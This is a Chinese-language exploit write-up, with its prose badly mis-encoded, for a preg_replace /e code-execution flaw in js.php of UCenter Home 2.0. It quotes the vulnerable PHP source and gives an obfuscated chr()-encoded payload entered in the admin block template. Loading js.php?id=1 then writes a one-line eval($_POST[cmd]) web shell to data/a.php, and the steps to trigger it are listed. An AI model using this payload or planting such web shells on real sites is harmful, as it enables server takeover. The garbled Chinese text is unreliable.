uchome 2.0 JS.phpԶ̴ִ©

©ܣuchome<=2.0ĳjs.phpļڴִ©,ԭƥʱʹò,¿ύִPHP롣
 
Phpе˫ģ
 
 ˫ֶλᾭͣȻٵHTML
 
 Ĳнֱͣ
 
 
 
ƥ\2˫˴ִС
 
 
 
Js.php 
 
       ݵ include template(data/blocktpl/$id);
 
       
 
       $obcontent = ob_get_contents();
 
       obclean();
 
       
 
       $s = array(/(r|n)/, /<divs+class=pages>.+?</div>/is, /s+(href|src)=(.+?)/ie);
 
       $r = array(n, , js_mkurl(\1, \2));//ִ 
 
 
 
       $content = ;
 
       if($obcontent) {
 
               $obcontent = preg_replace($s, $r, $obcontent);
 
               $lines = explode(n, $obcontent);
 
               foreach ($lines as $line) {
 
                     $line = addcslashes(trim($line), /\');
 
                     $content .= document.writeln($line);n;
 
               }
 
       } else {
 
               $content .= document.writeln(NO DATA); 
 
 
 
 
 
       }
 
Ի:
 
ϵͳ:Windows 2003 + IIS + PHP 5.2.9-2 + Mysql 5.0.67
 
򻷾:Ucenter Home 2.0(ٷ) + Ucenter 1.5(ٷ) 
 
 
 
Է:
 
 
 
ڱذװһȫµuchome.©ǰǫ̃Ȩޡͨ繤ע̽Xss ֶõԱ벢̨
 
Ŵadmincp.php?ac=block&op=addѡһһģ顣ģơĬϼɡȻύͼ
 
 
 
ʾHtml봦´Ȼύ
 
ݵ <a href={${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}>a</a>
 
 
 
Ϊfputs(fopen(data/a.php,'w),<?php eval($_POST[cmd])?>);
 
 
 
һIDID1һjs.php?id=1
 
 
 
dataĿ¼a.phpһ仰ľcmd
 
 
 
ID2 ҷ js.php?id=2
 
 
 
 
 
ʺdata Ŀ¼¶һa.php 